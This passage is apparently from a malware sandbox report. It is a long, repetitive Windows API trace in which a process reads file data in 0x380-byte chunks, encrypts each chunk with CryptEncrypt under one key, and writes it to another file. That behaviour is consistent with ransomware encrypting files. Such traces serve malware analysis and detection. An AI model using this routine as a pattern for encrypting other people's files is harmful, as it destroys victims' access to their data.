lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.093] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.093] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.093] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.094] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.094] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.095] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.095] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.095] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.096] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.096] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.097] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.098] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.098] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.099] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.099] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.100] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.100] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.101] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.102] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.103] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 